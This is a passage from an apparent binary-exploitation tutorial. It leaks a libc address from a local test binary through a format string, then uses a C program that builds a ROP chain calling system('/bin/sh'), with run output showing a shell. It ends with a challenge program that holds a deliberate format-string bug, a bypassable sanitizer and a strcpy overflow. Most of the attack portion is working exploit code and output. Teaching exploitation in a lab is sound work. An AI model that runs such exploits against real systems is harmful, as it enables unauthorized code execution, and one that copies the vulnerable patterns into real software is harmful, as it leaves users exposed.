0x7ffd7d19b424[stack]
0x7fff36aa842a[stack]
0x7ffd554fc430[stack]
0x7ffde4e6e440[stack]
0x7ffc987f2490[stack]
0x7ffe4bb2c4a3[stack]

  ...

0x7f397842e000[libc]
0x401090[binary]
0x7ffe16452c99[stack]
0x7ffff5590ff2[stack]
0x7ffc992e0f99[stack]
  ...

~/pwnme$ ./f00 "%8\$p"
0x7f0070243825 < looks promising

As shown, PIE = No means binary addresses (including GOT) are predictable some stack slots and probe positions will contain libc pointers (these vary run-to-run under ASLR). Now, we need to calculate the libc base using this leaked address. To achieve this, we must determine the offset between the leaked address and the libc address. This way, the next time the libc address changes, we can utilize the offset and the leaked address to determine the libc base.

exploit.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdint.h>

#define _RD 0x401253 // ROPgadget --binary ./f00 | grep "pop rdi"
#define _RT 0x401010 // _RT gadget 
#define _ST 0x52290 // readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep " system"
#define _DH 0x1b45bd // /bin/sh

int main() {
  printf("[*] Getting libc leak...\n");

  FILE * fp = popen("./f00 '%10$llx'", "r");
  char leak_str[20];
  fscanf(fp, "%19s", leak_str);
  pclose(fp);

  uint64_t leak = strtoull(leak_str, NULL, 16);
  printf("[+] Leaked: 0x%lx\n", leak);

  // Calculate page-aligned libc base
  uint64_t libc_base = leak & 0x7FFFFFFFFFFFF000;
  uint64_t system = libc_base + _ST;
  uint64_t binsh = libc_base + _DH;

  printf("[+] Libc base: 0x%lx\n", libc_base);
  printf("[+] system: 0x%lx\n", system);
  printf("[+] /bin/sh: 0x%lx\n", binsh);

  // Build payload with stack alignment
  char payload[200];
  memset(payload, 'A', 72);

  // ROP chain
  uint64_t * rop = (uint64_t * )(payload + 72);
  rop[0] = _RD; // pop rdi; ret
  rop[1] = binsh; // /bin/sh string
  rop[2] = _RT; // Stack alignment
  rop[3] = system; // system()

  printf("[*] ROP chain: pop_rdi -> /bin/sh -> ret -> system\n");

  char * argv[] = {
    "./f00",
    payload,
    NULL
  };
  execve("./f00", argv, NULL);

  perror("execve");
  return 1;
}

For the ROP chain in the exploit, I used https://github.com/JonathanSalwan/ROPgadget to find the necessary gadgets in the binary,

let’s try it

~/pwnme$ ./exploit 
[*] Getting libc leak...
[+] Leaked: 0x7f85c1d1e2e8
[+] Libc base: 0x7f85c1d1e000
[+] system: 0x7f85c1d70290
[+] /bin/sh: 0x7f85c1ed25bd
[*] ROP chain: pop_rdi -> /bin/sh -> ret -> system
$ 

and just like that bingo !! Finally, we have successfully obtained our shell.

Before we end, here’s a simple challenge. Try to solve it here’s the source code. It’s similar to what we had before, but with a naive twist that you need to bypass.

#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stdlib.h>

char * s_input(const char * input) {
  if (input == NULL) return NULL;

  size_t len = strlen(input);
  char * sanitized = malloc(len * 2 + 1);
  if (!sanitized) return NULL;

  int j = 0;
  int in_encoding = 0;
  char hex_buf[3] = {
    0
  };
  int hex_index = 0;

  for (int i = 0; i < len; i++) {
    if (input[i] == '%' && isxdigit(input[i + 1]) && isxdigit(input[i + 2])) {
      hex_buf[0] = input[i + 1];
      hex_buf[1] = input[i + 2];
      int decoded_char = strtol(hex_buf, NULL, 16);

      if (decoded_char == 'n' || decoded_char == 's') {
        i += 2;
        continue;
      }

      sanitized[j++] = (char) decoded_char;
      i += 2;
      continue;
    }

    if (input[i] == '%') {
      sanitized[j++] = '%';
      sanitized[j++] = '%';
      continue;
    }

    if (isalnum(input[i]) || input[i] == ' ' || input[i] == '_' || input[i] == '-') {
      sanitized[j++] = input[i];
    } else {
      sprintf( & sanitized[j], "%%%02X", (unsigned char) input[i]);
      j += 3;
    }
  }
  sanitized[j] = '\0';
  return sanitized;
}

void audit(const char * user_action,
  const char * details) {
  char log_buffer[256];
  snprintf(log_buffer, sizeof(log_buffer),
    "User action='%s', Details='%s'",
    user_action, details);
  printf(log_buffer);
  printf("\n");
}

void process_request(char * input) {
  char buffer[64];

  printf("Processing...\n");

  char * processed = s_input(input);
  if (!processed)
    return;

  audit(processed, "Processing_request");
  strcpy(buffer, processed);

  printf("Completed: %s\n", buffer);
  free(processed);
}

int main(int argc, char * argv[]) {
  if (argc < 2) {
    printf("Usage: %s <input>\n", argv[0]);
    return 1;
  }

  process_request(argv[1]);
  return 0;
}

Enjoy !!